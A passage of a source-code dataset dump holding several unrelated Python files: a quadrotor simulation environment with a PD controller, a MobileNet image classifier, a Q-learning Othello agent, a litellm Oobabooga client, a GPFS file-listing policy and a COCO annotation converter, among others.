trj_gen(self,t):\n\t\tt_max=4.0\n\t\tt = np.maximum(0,np.minimum(t,t_max))\n\t\tt = t/t_max\n\t\tpos = 10.0*t**3 - 15.0*t**4 + 6.0*t**5;\n\t\tvel = (30/t_max)*t**2 - (60/t_max)*t**3 + (30/t_max)*t**4;\n\t\tacc = (60/t_max**2)*t - (180/t_max**2)*t**2 + (120/t_max**2)*t**3;\n\t\t#self.desired_state=[pos,pos,pos,vel,vel,vel,acc,acc,acc,pos,vel]\n\t\treturn [pos,pos,pos,vel,vel,vel,acc,acc,acc,pos,vel]\n\n\tdef plot_state(self):\n\t\tfrom mpl_toolkits.mplot3d import axes3d, Axes3D\n\n\t\tfig1=plt.figure(1)\n\t\tprint(\"plot_state\")\n\t\t#t=np.arange(0.0,len(self.cum_state)*self.dt,self.dt)\n\t\tplt.plot(self.cum_t, self.cum_state[:,0],'b',self.cum_t, self.cum_desired_state[:,0],'r-.')\n\t\t#plt.plot(self.cum_t, self.cum_desired_state[:,0])\n\t\tplt.title(\"title\")\n\t\tplt.xlabel(\"Time(s)\")\n\t\tplt.ylabel(\"m\")\n\t\tplt.legend([\"position x\",\"desired x\"])\n\t\tplt.grid(True)\n\t\tfig1.savefig(\"position_plot.pdf\",format='pdf')\n\n\t\tfig2=plt.figure(2)\n\t\tplt.plot(self.cum_t, self.cum_state[:,3],'b',self.cum_t, self.cum_desired_state[:,3],'r-.')\n\t\t#plt.plot(self.cum_t, self.cum_desired_state[:,0])\n\t\tplt.title(\"title\")\n\t\tplt.xlabel(\"Time(s)\")\n\t\tplt.ylabel(\"m/s\")\n\t\tplt.legend([\"velocity x\",\"desired vel x\"])\n\t\tplt.grid(True)\n\t\tfig2.savefig(\"velocity_plot.pdf\",format='pdf')\n\n\t\tfig3=plt.figure(3)\n\t\tplt.plot(self.cum_t, 
self.cum_state[:,8],'b',self.cum_t, self.cum_desired_state[:,9],'r-.')\n\t\t#plt.plot(self.cum_t, self.cum_desired_state[:,0])\n\t\tplt.title(\"title\")\n\t\tplt.xlabel(\"Time(s)\")\n\t\tplt.ylabel(\"rad\")\n\t\tplt.legend([\"yaw x\",\"desired yaw\"])\n\t\tplt.grid(True)\n\t\tfig3.savefig(\"yaw_plot.pdf\",format='pdf')\n\n\t\tfig1=plt.figure(4)\n\t\tax = Axes3D(fig1)\n\t\tprint(\"plot_state\")\n\t\t#t=np.arange(0.0,len(self.cum_state)*self.dt,self.dt)\n\t\tplt.plot(self.cum_t, self.cum_state[:,0],'b',self.cum_t, self.cum_desired_state[:,0],'r-.')\n\t\t#plt.plot(self.cum_t, self.cum_desired_state[:,0])\n\t\tplt.title(\"title\")\n\t\tplt.xlabel(\"Time(s)\")\n\t\tplt.ylabel(\"m\")\n\t\tplt.legend([\"position x\",\"desired x\"])\n\t\tplt.grid(True)\n\t\tfig1.savefig(\"3dposition_plot.pdf\",format='pdf')\n\t\tplt.show()\n\n\n\tdef quad_eq_of_motion1(self,state,time):\n\t\tcur_state=self.stateToQd(state)\n\t\tdesired_state=self.trj_gen(time)\n\t\tF,M=self.controller(time,cur_state,desired_state)\n\t\tsdot=self.quad_eq_of_motion2(state,time,F,M)\n\t\t# Debug state\n\t\t# print(\"cur_state=\",cur_state)\n\t\t# print(\"desired_state=\",desired_state)\n\t\t# print(\"F=\",F)\n\t\t# print(\"M=\",M)\n\t\t# print(\"sdot=\",sdot)\n\t\treturn sdot\n\n\tdef quad_eq_of_motion2(self,state,time,force,moment):\n\t\t\t\"\"\"output the derivative of the state vector\"\"\"\n\n\t\t\tA = np.matrix([ [0.25,0, -0.5/self.arm_length],\n\t\t\t\t[0.25,0.5/self.arm_length,0.],\n\t\t\t\t[0.25,0,0.5/self.arm_length],\n\t\t\t\t[0.25,-0.5/self.arm_length,0]])\n\t\t\tT=A*np.asmatrix(np.hstack((force,moment[:2]))).transpose()\n\t\t\tT_clamped=np.maximum(np.minimum(T,self.max_force/4.0),self.min_force/4.0)\n\t\t\tB = np.matrix([[1.0,1.0,1.0,1.0],\n\t\t\t\t\t\t\t[0.0,self.arm_length,0.0,-self.arm_length],\n\t\t\t\t\t\t\t[-self.arm_length,0.0,self.arm_length,0.]])\n\t\t\tforce = B[[0],:]*T_clamped;\n\t\t\tforce = np.array(force).reshape(-1,).tolist()\n\t\t\tmoment = np.vstack( (B[[1,2],:]*np.asmatrix(T_clamped), moment[2]));\n\t\t\tmoment = np.array(moment).reshape(-1,).tolist()\n\t\t\t\n\t\t\t#Assign 13 states\n\t\t\t#x = state[0]\n\t\t\t#y = state[1]\n\t\t\t#z = state[2]\n\t\t\txdot = state[3];\n\t\t\tydot = state[4];\n\t\t\tzdot = state[5];\n\t\t\tqW = state[6];\n\t\t\tqX = state[7];\n\t\t\tqY = state[8];\n\t\t\tqZ = state[9];\n\t\t\tp = state[10];\n\t\t\tq = state[11];\n\t\t\tr = state[12];\n\n\t\t\tquat = np.vstack((qW,qX,qY,qZ)); #!! 
Attention to the order!!\n\t\t\tbRw=self.quat2mat(quat.transpose())\n\t\t\tbRw=bRw.reshape(3,3) #to remove the last dimension i.e., 3,3,1\n\t\t\twRb = bRw.transpose()\n\t\t\t\n\t\t\t# Acceleration\n\t\t\taccel = 1.0 / self.mass * (wRb * np.matrix([[0],[0],force]) - np.matrix([[0],[0],[self.mass * self.gravity]]))\n\t\t\taccel = np.array(accel).reshape(-1,).tolist()\n\t\t\t# Angular velocity\n\t\t\tK_quat = 2.0; #%this enforces the magnitude 1 constraint for the quaternion\n\t\t\tquaterror = 1 - (qW**2 + qX**2 + qY**2 + qZ**2);\n\t\t\tqdot = -1/2*np.matrix([ [0,-p,-q,-r],[p,0,-r,q],[q,r,0,-p],[r,-q,p,0]])*quat + K_quat*quaterror * quat\n\t\t\tqdot = np.array(qdot).reshape(-1,).tolist()\n\t\t\t# % Angular acceleration\n\t\t\tomega = np.matrix([[p],[q],[r]])\n\t\t\ttemp = np.squeeze(np.cross(omega.transpose(),(self.Inertia*omega).transpose()))\n\t\t\tpqrdot = self.invInertia * (moment - temp).reshape(-1,1)\n\t\t\tsdot=np.zeros(13) #default=float64\n\t\t\tsdot[0]=xdot#[]\n\t\t\tsdot[1]=ydot\n\t\t\tsdot[2]=zdot\n\t\t\tsdot[3]=accel[0]\n\t\t\tsdot[4]=accel[1]\n\t\t\tsdot[5]=accel[2]\n\t\t\tsdot[6]=qdot[0]\n\t\t\tsdot[7]=qdot[1]\n\t\t\tsdot[8]=qdot[2]\n\t\t\tsdot[9]=qdot[3]\n\t\t\tsdot[10]=pqrdot[0]\n\t\t\tsdot[11]=pqrdot[1]\n\t\t\tsdot[12]=pqrdot[2]\n\t\t\treturn sdot\n\t\t\t\n\t#stealed from rotations.py\n\tdef quat2mat(self,quat):\n\t \"\"\" Convert Quaternion to Rotation matrix. See rotation.py for notes \"\"\"\n\t quat = np.asarray(quat, dtype=np.float64)\n\t assert quat.shape[-1] == 4, \"Invalid shape quat {}\".format(quat)\n\n\t w, x, y, z = quat[..., 0], quat[..., 1], quat[..., 2], quat[..., 3]\n\t Nq = np.sum(quat * quat, axis=-1)\n\t s = 2.0 / Nq\n\t X, Y, Z = x * s, y * s, z * s\n\t wX, wY, wZ = w * X, w * Y, w * Z\n\t xX, xY, xZ = x * X, x * Y, x * Z\n\t yY, yZ, zZ = y * Y, y * Z, z * Z\n\n\t mat = np.empty(quat.shape[:-1] + (3, 3), dtype=np.float64)\n\t mat[..., 0, 0] = 1.0 - (yY + zZ)\n\t mat[..., 0, 1] = xY - wZ\n\t mat[..., 0, 2] = xZ + wY\n\t mat[..., 1, 0] = xY + wZ\n\t mat[..., 1, 1] = 1.0 - (xX + zZ)\n\t mat[..., 1, 2] = yZ - wX\n\t mat[..., 2, 0] = xZ - wY\n\t mat[..., 2, 1] = yZ + wX\n\t mat[..., 2, 2] = 1.0 - (xX + yY)\n\t return np.where((Nq > _FLOAT_EPS)[..., np.newaxis, np.newaxis], mat, np.eye(3))\n\t\n\tdef stateToQd(self,s):\n\t\t# return is 1x12\n\t\t# This function converts the quaternion to ZXY euler angle, no more or less\n\t\tqd=np.zeros(12)\n\t\tfor i in range(6): qd[i]=s[i] #pos,vel\n\t\tquat = np.vstack((s[6],s[7],s[8],s[9])); #!! 
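The qdot line above adds a normalization feedback term to the usual quaternion kinematics: K_quat * (1 - ||q||^2) * q pushes the integrated quaternion back toward unit norm, which matters here because plain Euler integration lets the norm drift. The same computation as a standalone function:

import numpy as np

def quat_derivative(quat, p, q, r, K_quat=2.0):
    # quat ordered (w, x, y, z), as in the state vector above.
    omega = np.array([[0, -p, -q, -r],
                      [p,  0, -r,  q],
                      [q,  r,  0, -p],
                      [r, -q,  p,  0]])
    quaterror = 1.0 - np.dot(quat, quat)   # 1 - ||q||^2
    return -0.5 * omega @ quat + K_quat * quaterror * quat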
Attention to the order!!, w,x,y,z\n\t\tR=self.quat2mat(quat.transpose())\n\t\tphi, theta, yaw = self.RotToRPY(R)\n\t\tqd[6]=phi\n\t\tqd[7]=theta\n\t\tqd[8]=yaw\n\t\tfor i in range(3): qd[9+i]=s[10+i] #omega\n\t\treturn qd\n\n\tdef controller(self,time,cur_state,desired_state):\n\t\tstate=np.asmatrix(cur_state) #1x12 vector, x,y,z,dx,dy,dz,phi,theta,yaw,p,q,r\n\t\tdesired_state=np.asmatrix(desired_state) #1x11 vector, x,y,z,dz,dy,dz,ddx,ddy,ddz,yaw,dyaw\n\t\t\n\t\terror_p=desired_state[[0],[0,1,2]]-state[[0],[0,1,2]]\n\t\terror_v=desired_state[[0],[3,4,5]]-state[[0],[3,4,5]]\n\t\tkp=np.array([10,10,35]);\n\t\tkd=np.array([5,5,22]);\n\t\tkp_rot=np.array([100,100,100]);\n\t\tkd_rot=np.array([.1,.1,.1]);\n\t\tpsi_des=desired_state[[0],[9]] #desired yaw\n\t\tphi=state[[0],[6]]\n\t\ttheta=state[[0],[7]]\n\t\tpsi=state[[0],[8]]\n\t\tp=state[[0],[9]]\n\t\tq=state[[0],[10]]\n\t\tr=state[[0],[11]]\n\t\tdpsi_des=desired_state[[0],[10]]\n\t\tddr=desired_state[[0],[6,7,8]].transpose()+np.diag(kd)*error_v.transpose()+np.diag(kp)*error_p.transpose()\n\t\tu1=self.mass*(self.gravity+ddr[2])\n\n\t\tphi_des=1/self.gravity*(ddr[0]*math.sin(psi_des)-ddr[1]*math.cos(psi_des))\n\t\ttheta_des=1/self.gravity*(ddr[0]*math.cos(psi_des)+ddr[1]*math.sin(psi_des))\n\t\tmx=kp_rot[0]*(phi_des-phi)-kd_rot[0]*p\n\t\tmy=(kp_rot[1]*(theta_des-theta)-kd_rot[1]*q)\n\t\tmz=(kp_rot[2]*(psi_des-psi)+kd_rot[2]*(dpsi_des-r))\n\t\t# Moment\n\t\tmoment= np.concatenate((mx,my,mz))\n\t\t# # Thrust\n\t\tforce = np.array(u1).reshape(-1,).tolist()\n\t\tmoment=[moment[0,0],moment[1,0],moment[2,0]]\n\t\treturn force,moment\n\n\n\n\tdef RotToRPY(self,R):\n\t\tR=R.reshape(3,3) #to remove the last dimension i.e., 3,3,1\n\t\tphi = math.asin(R[1,2])\n\t\tpsi = math.atan2(-R[1,0]/math.cos(phi),R[1,1]/math.cos(phi))\n\t\ttheta = math.atan2(-R[0,2]/math.cos(phi),R[2,2]/math.cos(phi))\n\t\treturn phi,theta,psi\n\n\tdef reset(self):\n\t\tprint(\"reset\")\n\t\t#self.state = np.array([self.np_random.uniform(low=-0.6, high=-0.4), 0])\n\t\treturn np.array(self.state)\n\n\tdef render(self, mode='human', close=False):\n\t\tprint(\"render() called\")\n","repo_name":"ethz-asl/reinmav-gym","sub_path":"gym_reinmav/envs/native/reinmav_env.py","file_name":"reinmav_env.py","file_ext":"py","file_size_in_byte":11336,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"27"} +{"seq_id":"38238730005","text":"# The class containing the model\nimport torch\nfrom PIL import Image\nimport torchvision\nfrom torchvision import transforms\n\nclass MobileNet:\n def __init__(self):\n # Source: https://github.com/Lasagne/Recipes/blob/master/examples/resnet50/imagenet_classes.txt\n with open('imagenet_classes.txt') as f:\n self.classes = [line.strip() for line in f.readlines()]\n\n # self.model = torch.hub.load('pytorch/vision', 'mobilenet_v2', pretrained=True)\n self.model = torchvision.models.mobilenet_v2(pretrained=True)\n self.model.eval()\n \n def infer(self, image_path):\n input_image = Image.open(image_path)\n preprocess = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n input_tensor = preprocess(input_image)\n\n # create a mini-batch as expected by the model\n input_batch = input_tensor.unsqueeze(0) \n\n # move the input and model to GPU for speed if available\n if torch.cuda.is_available():\n input_batch = input_batch.to('cuda')\n self.model.to('cuda')\n\n with torch.no_grad():\n output = 
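controller() above is a cascaded PD design: a position/velocity loop produces a commanded acceleration ddr, the vertical channel sets the thrust u1 = m(g + ddr_z), and the horizontal channels are converted to desired roll/pitch angles about the desired yaw via a small-angle approximation. That mapping, isolated (the mass and gravity values here are placeholders, not the class's parameters):

import math

def accel_to_attitude(ddx, ddy, ddz, psi_des, mass=0.18, gravity=9.81):
    u1 = mass * (gravity + ddz)  # total thrust tracks the vertical channel
    # Small-angle mapping of horizontal acceleration to roll/pitch.
    phi_des = (ddx * math.sin(psi_des) - ddy * math.cos(psi_des)) / gravity
    theta_des = (ddx * math.cos(psi_des) + ddy * math.sin(psi_des)) / gravity
    return u1, phi_des, theta_des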
self.model(input_batch)\n\n # The output has unnormalized scores. To get probabilities, you can run a softmax on it.\n output = torch.nn.functional.softmax(output[0], dim=0)\n confidence, index = torch.max(output, 0)\n\n return (self.classes[index.item()], confidence.item())\n\n\n\n","repo_name":"imadtoubal/Pytorch-Flask-Starter","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"27"} +{"seq_id":"797410771","text":"\"\"\" test.py --- Simple test suite\n\"\"\"\nfrom angbao import (loadreddat, profiled_likelihood)\nfrom numpy import (linspace, concatenate)\nfrom pandas import (DataFrame)\nfrom sys import (argv)\n\n\nif __name__ == '__main__':\n if (len(argv) != 7):\n print(\"Usage:\", argv[0], \" \")\n exit(2)\n\n measfn = argv[1]\n tempfn = argv[2]\n kind = \"aA%dB%d\" % (int(argv[3]), int(argv[4]))\n data = argv[5]\n ofn = argv[6]\n template = 'wg'\n\n print(\"Loading data\")\n ll, dd, icc, model = loadreddat(measfn, tempfn)\n\n print(\"Profiling likelihood PDF\")\n da, amin, amax = 0.001, 0.8, 1.2\n alpha = linspace(amin, amax, int((amax - amin) / da) + 1)\n out = profiled_likelihood(alpha, ll, dd, icc, model, template=template,\n kind=kind)\n\n print(\"Saving data\")\n dof = (len(ll) * len(ll[0]) - (out.shape[1] - 1))\n out_red = concatenate((out,\n out[:, -1].reshape(out.shape[0], 1) / dof),\n axis=1)\n names = ['alpha']\\\n + ['nuis%d' % (i) for i in range(out_red.shape[1] - 3)]\\\n + ['chi2', 'chi2_red']\n DataFrame(data=out_red, columns=names).set_index('alpha').to_csv(ofn)\n","repo_name":"hocamachoc/angbao","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12378202310","text":"import ctcdecode\nimport json\nimport argparse\n\nparser = argparse.ArgumentParser(description='LM Dictionary Generation')\nparser.add_argument('--labels', help='path to label json file', default='labels.json')\nparser.add_argument('--dict_path', help='path to text dictionary (one word per line)', default='vocab.txt')\nparser.add_argument('--lm_path', help='path to the kenlm language model (optional)', default=None)\nparser.add_argument('--output_path', help='path of output dictionary trie', default='vocab.dic')\n\n\ndef main():\n args = parser.parse_args()\n with open(args.labels, \"r\") as fh:\n label_data = json.load(fh)\n\n labels = ''.join(label_data)\n\n ctcdecode.generate_lm_dict(args.dict_path, args.output_path, labels, kenlm_path=args.lm_path,\n blank_index=labels.index('_'), space_index=labels.index(' '))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"synxlin/chinese-chat-bot","sub_path":"src/speech_recognition/decoder/generate_lm_dict.py","file_name":"generate_lm_dict.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"24421466818","text":"import os\nimport json\nfrom enum import Enum\nimport requests\nimport time\nfrom typing import Callable, Optional\nfrom litellm.utils import ModelResponse\nfrom .prompt_templates.factory import prompt_factory, custom_prompt\n\nclass OobaboogaError(Exception):\n def __init__(self, status_code, message):\n self.status_code = status_code\n self.message = message\n super().__init__(\n self.message\n ) # Call the base class constructor with the parameters it needs\n\ndef 
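The MobileNet record above returns only the arg-max class. If top-k output is wanted instead, the same softmax tensor supports it directly; a small sketch (assuming the 1-D `output` probabilities and the `classes` list from the snippet):

import torch

def top_k(probabilities, classes, k=5):
    # probabilities: 1-D softmax output; returns [(label, confidence), ...]
    confidences, indices = torch.topk(probabilities, k)
    return [(classes[i], c.item()) for i, c in zip(indices.tolist(), confidences)]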
validate_environment(api_key):\n headers = {\n \"accept\": \"application/json\",\n \"content-type\": \"application/json\",\n }\n if api_key:\n headers[\"Authorization\"] = f\"Token {api_key}\"\n return headers\n\ndef completion(\n model: str,\n messages: list,\n api_base: Optional[str],\n model_response: ModelResponse,\n print_verbose: Callable,\n encoding,\n api_key,\n logging_obj,\n custom_prompt_dict={},\n optional_params=None,\n litellm_params=None,\n logger_fn=None,\n default_max_tokens_to_sample=None,\n):\n headers = validate_environment(api_key)\n if \"https\" in model:\n completion_url = model\n elif api_base:\n completion_url = api_base\n else: \n raise OobaboogaError(status_code=404, message=\"API Base not set. Set one via completion(..,api_base='your-api-url')\")\n model = model\n if model in custom_prompt_dict:\n # check if the model has a registered custom prompt\n model_prompt_details = custom_prompt_dict[model]\n prompt = custom_prompt(\n role_dict=model_prompt_details[\"roles\"], \n initial_prompt_value=model_prompt_details[\"initial_prompt_value\"], \n final_prompt_value=model_prompt_details[\"final_prompt_value\"], \n messages=messages\n )\n else:\n prompt = prompt_factory(model=model, messages=messages)\n \n completion_url = completion_url + \"/api/v1/generate\"\n data = {\n \"prompt\": prompt,\n **optional_params,\n }\n ## LOGGING\n logging_obj.pre_call(\n input=prompt,\n api_key=api_key,\n additional_args={\"complete_input_dict\": data},\n )\n ## COMPLETION CALL\n response = requests.post(\n completion_url, headers=headers, data=json.dumps(data), stream=optional_params[\"stream\"] if \"stream\" in optional_params else False\n )\n if \"stream\" in optional_params and optional_params[\"stream\"] == True:\n return response.iter_lines()\n else:\n ## LOGGING\n logging_obj.post_call(\n input=prompt,\n api_key=api_key,\n original_response=response.text,\n additional_args={\"complete_input_dict\": data},\n )\n print_verbose(f\"raw model_response: {response.text}\")\n ## RESPONSE OBJECT\n try:\n completion_response = response.json()\n except:\n raise OobaboogaError(message=response.text, status_code=response.status_code)\n if \"error\" in completion_response:\n raise OobaboogaError(\n message=completion_response[\"error\"],\n status_code=response.status_code,\n )\n else:\n try:\n model_response[\"choices\"][0][\"message\"][\"content\"] = completion_response['results'][0]['text']\n except:\n raise OobaboogaError(message=json.dumps(completion_response), status_code=response.status_code)\n\n ## CALCULATING USAGE\n prompt_tokens = len(\n encoding.encode(prompt)\n ) \n completion_tokens = len(\n encoding.encode(model_response[\"choices\"][0][\"message\"][\"content\"])\n )\n\n model_response[\"created\"] = time.time()\n model_response[\"model\"] = model\n model_response[\"usage\"] = {\n \"prompt_tokens\": prompt_tokens,\n \"completion_tokens\": completion_tokens,\n \"total_tokens\": prompt_tokens + completion_tokens,\n }\n return model_response\n\ndef embedding():\n # logic for parsing in - calling - parsing out model embedding calls\n pass\n","repo_name":"ishaan-jaff/litellm-test3","sub_path":"litellm/llms/oobabooga.py","file_name":"oobabooga.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"14262020156","text":"from collections import deque\nimport random\n\nimport numpy as np\nimport numpy.ma as ma\n\nimport tensorflow\nfrom tensorflow.keras import Sequential\nfrom 
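The tail of completion() above derives usage purely from the supplied `encoding` object, so anything with an encode(str) -> list-of-tokens method works. Isolated for clarity:

def build_usage(encoding, prompt, completion_text):
    # Mirrors the usage block in completion(): token counts on both sides.
    prompt_tokens = len(encoding.encode(prompt))
    completion_tokens = len(encoding.encode(completion_text))
    return {
        "prompt_tokens": prompt_tokens,
        "completion_tokens": completion_tokens,
        "total_tokens": prompt_tokens + completion_tokens,
    }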
tensorflow.keras.layers import Flatten, Dense, Conv2D\nfrom tensorflow.keras.optimizers import Adam, Nadam\n\n\nclass QActor:\n def __init__(self, model):\n self.model = model\n self.history = deque(maxlen=64000)\n self.learn_mod = 0\n\n\n def get_action(self, state, action_mask=None, epsilon=0):\n if action_mask is None:\n return self.get_actions([state], None, epsilon)\n return self.get_actions([state], [action_mask], epsilon)\n\n\n def get_actions(self, states, action_masks=None, epsilon=0):\n x = np.array(states)\n y = np.array(self.model(x))\n if action_masks is None: action_masks = np.zeros(y.shape)\n\n choices = ma.masked_array(y, mask=action_masks).argmax(axis=1)\n\n\n # Epsilon randomness\n for case_idx in range(len(x)):\n if random.random() >= epsilon:\n \"\"\"\n if len(states) == 1:\n print(' Making move', '%2d' % choices[0], 'I expect to get me', '%6.2f' % y[0][choices[0]])\n \"\"\"\n continue\n choices[case_idx] = random.choice([\n action_idx\n for action_idx, masked in enumerate(action_masks[case_idx])\n if not masked\n ])\n \"\"\"\n if len(states) == 1:\n print('EPSILON: Making move', '%2d' % choices[0], 'I expect to get me', '%6.2f' % y[0][choices[0]])\n \"\"\"\n\n return choices\n\n\n def run_once(self, env, learn=False, epsilon=0, render=True, verbose=1):\n state, reward, done, info = env.reset()\n\n while not done:\n if render: env.render()\n\n action_mask = info.get('action_mask', None)\n action = self.get_action(state, action_mask, epsilon)[0]\n\n next_state, reward, done, info = env.step(action)\n if verbose: print(action, '=>', reward, done)\n next_action_mask = info.get('action_mask', None)\n self.history.append((state, action_mask, action, reward, next_state, next_action_mask, done))\n\n if learn:\n self.learn()\n\n if render: env.render()\n self.post_run(info, verbose=verbose)\n return reward\n\n\n def train(self, env, render=True, verbose=1):\n epsilon = 1\n epsilon_decay = .9995\n epsilon_min = .01\n\n games_played = 0\n games_won = 0\n recent = { n: deque(maxlen=n) for n in (10,100,1000) }\n\n while True:\n end_reward = self.run_once(env, learn=True, epsilon=epsilon, render=render, verbose=verbose == 2)\n won = (env.game.winner() == 0)\n for n in recent:\n recent[n].append(won)\n games_played += 1\n\n if won: games_won += 1\n if verbose and games_played % 1 == 0:\n print('Playing with epsilon=%.4f' % epsilon, end=' ')\n print('%8d' % end_reward, 'W ' if won else ' L', end=' ')\n print('%d/%d (%.2f)' % (games_won, games_played, games_won / games_played), end=' ')\n\n for n in recent:\n n_won = sum(recent[n])\n n_len = len(recent[n])\n if n_len == n:\n print('%4d/%d' % (n_won, n_len), end=' ')\n print()\n\n epsilon *= epsilon_decay\n epsilon = max(epsilon_min, epsilon)\n\n\n def post_run(self, info, verbose=0):\n return\n\n\n def learn(self, batch_size=16, discount=.9, verbose=0):\n if self.learn_mod != 0: self.learn_mod -= 1; return\n self.learn_mod = 10\n\n if len(self.history) < batch_size: return\n batch = random.sample(self.history, batch_size)\n states, action_masks, actions, rewards, next_states, next_action_masks, dones = zip(*batch)\n\n states = np.array(states)\n\n state_preds = self.model.predict(states)\n next_preds = self.model.predict(next_states)\n\n for idx, action in enumerate(actions):\n if dones[idx]:\n q_learned = rewards[idx]\n elif next_action_masks is not None:\n masked = ma.masked_array(next_preds[idx], mask=next_action_masks[idx])\n q_learned = rewards[idx] + discount * np.amax(masked)\n else:\n q_learned = rewards[idx] + discount * 
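get_actions above relies on a numpy.ma convention that is easy to misread: in a masked array, truthy mask entries mark *invalid* cells, so argmax silently skips illegal actions. A two-line check:

import numpy as np
import numpy.ma as ma

q_values = np.array([[0.2, 0.9, 0.5]])
mask = np.array([[0, 1, 0]])  # action 1 is illegal
choice = ma.masked_array(q_values, mask=mask).argmax(axis=1)
assert choice[0] == 2         # 0.9 is masked out, so 0.5 wins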
np.amax(next_preds[idx])\n\n state_preds[idx][action] = q_learned\n\n self.model.fit(states, state_preds, verbose=0)\n \n\nclass OthelloQActor(QActor):\n def __init__(self, model_path='models/othelloqactor.h5'):\n model = Sequential()\n \"\"\"\n model.add(Conv2D(8, (8, 8), padding='same', data_format='channels_first', activation=\"relu\", input_shape=(2, 8, 8)))\n model.add(Conv2D(8, (5, 5), padding='same', data_format='channels_first', activation=\"relu\", input_shape=(2, 8, 8)))\n model.add(Conv2D(8, (3, 3), padding='same', data_format='channels_first', activation=\"relu\", input_shape=(2, 8, 8)))\n model.add(Flatten())\n \"\"\"\n model.add(Flatten(input_shape=(2, 8, 8)))\n model.add(Dense(2048, activation='relu'))\n model.add(Dense(1024, activation='relu'))\n model.add(Dense(128, activation='relu'))\n model.add(Dense(64, activation='relu'))\n model.compile(optimizer=Nadam(), loss='mse')\n model.summary()\n QActor.__init__(self, model)\n\n\n def post_run(self, info, verbose):\n if verbose:\n print('Game Over! Piece diff:', info.get('piece_diff', 'unknown'))\n\n\n","repo_name":"MatthewMerrill/board-em-old","sub_path":"botclient/qactor.py","file_name":"qactor.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70703124231","text":"from arcapix.fs.gpfs import ManagementPolicy, MapReduceRule\n\n# create a management policy\np = ManagementPolicy()\n\n# define a rule that will build a list of path names\nr = p.rules.new(MapReduceRule, 'modlist', mapfn=lambda x: [x.path])\n\n# sort by modification time\nr.change(sort=\"current_timestamp - modification_time\")\n\n# only list path_name attribute\nr.change(show=r.show_attributes('PATH_NAME'))\n\n# include directories, links, etc in list\nr.change(directories_plus=True)\n\n# run the policy and grab the result\nresult = p.run('mmfs1')['modlist']\n\n# Write the compete sorted list of files to a txt file\nwith open('files.txt', 'w') as f:\n for line in result:\n f.write(line + '\\n')\n","repo_name":"arcapix/gpfsapi-examples","sub_path":"files_by_modification.py","file_name":"files_by_modification.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"74073206470","text":"import json\nimport numpy as np\nfrom xml.etree.ElementTree import Element, SubElement, tostring\nfrom xml.dom.minidom import parseString\nimport os\n# -----------------\n# txt数据格式:path,xmin,ymin,xmax,ymax\n# 每一行表示一个image\n# --------------------\n\nfilename = '/home/lab315/jzy/PaperLearning/MyUbuntu/YoloX-based-on-Swin-Transformer-master/coco/annotations/instances_train2017.json'\n# filename = '/home/jzy/PaperLearning/MyUbuntu/yolor/data/coco/labels/train2017/train.json'\n\nf = open(filename,encoding='utf-8')\nres = f.read()\ndata = json.loads(res)\n# 数据集共90个类\n# 保存数据的文件夹\nfolder = filename.split('.')[0]+'_txt'\nif not os.path.exists(folder):\n os.mkdir(folder)\n\n# 首先得到数据的categories的关键字\ncategory = data['categories']\ncategory_id ={}\nfor category_per in category:\n id = category_per['id']\n cls = category_per['name']\n category_id[id] = cls\n\nprint(category_id)\n# 开始遍历字典,对每一个图像生成xml文件\nimageID_all =[]\nimageID_all_info = {}\nfor images_attr in list(data.keys()):\n if images_attr == 'images':\n # 遍历每一个图像\n for data_per in data[images_attr]:\n # 获取图像名字\n image_name = data_per['file_name']\n # 获取图像路径\n image_route = data_per['coco_url']\n # 获取图像的像素和ID\n image_width = 
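The target assembled inside learn() is the standard one-step Q-learning bootstrap, with the same action mask applied to the next state so the agent never bootstraps from an illegal move. As a standalone helper:

import numpy as np
import numpy.ma as ma

def q_target(reward, done, next_preds, next_mask=None, discount=0.9):
    if done:
        return reward  # terminal transition: no bootstrap
    if next_mask is not None:
        best_next = np.amax(ma.masked_array(next_preds, mask=next_mask))
    else:
        best_next = np.amax(next_preds)
    return reward + discount * best_next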
data_per['width']\n image_height = data_per['height']\n image_id = data_per['id']\n imageID_all.append(image_id)\n imageID_all_info[image_id]={'width':image_width,'height':image_height,'path':image_route,'filename':image_name}\n\n elif images_attr == 'annotations':\n # 根据id遍历每张图像的bounding box\n for imageID_per in imageID_all:\n print(imageID_per)\n # 根据图像ID,构建图像基本信息子目录\n # 图像路径\n image_path = imageID_all_info[imageID_per]['path']\n # 每一张图片信息写在txt文件\n # filename1 = imageID_all_info[imageID_per]['filename'].split('.')[0]\n file_write = folder + '/' + image_path.split('.')[0].split('//')[-1] + '.txt'\n # 图像包含了多少个bounding box\n boundingBox_image = [j for j in data[images_attr] if j['image_id']==imageID_per]\n boundingBox_cord =''\n # 输出每张boundging box的坐标信息,以及所属类信息\n for boundingBox_per in boundingBox_image:\n # 添加boundingBox所属类的id\n id = boundingBox_per['category_id'] - 1\n # 位置信息转换,x,y,w,h转为xmin,ymin,xmax,ymax\n x = boundingBox_per['bbox'][0]\n y = boundingBox_per['bbox'][1]\n w = boundingBox_per['bbox'][2]\n h = boundingBox_per['bbox'][3]\n\n img_w = imageID_all_info[boundingBox_per[\"image_id\"]][\"width\"]\n img_h = imageID_all_info[boundingBox_per[\"image_id\"]][\"height\"]\n\n if round(x/img_w,6) < 0:\n lx = str(0)\n elif round(x / img_w, 6) > 1:\n lx = str(1)\n else:\n lx = str(round(x/img_w,6))\n\n if round((x+w)/img_w,6) < 0:\n rx = str(0)\n elif round((x+w)/img_w,6) > 1:\n rx = str(1)\n else:\n rx = str(round((x+w)/img_w,6))\n\n if 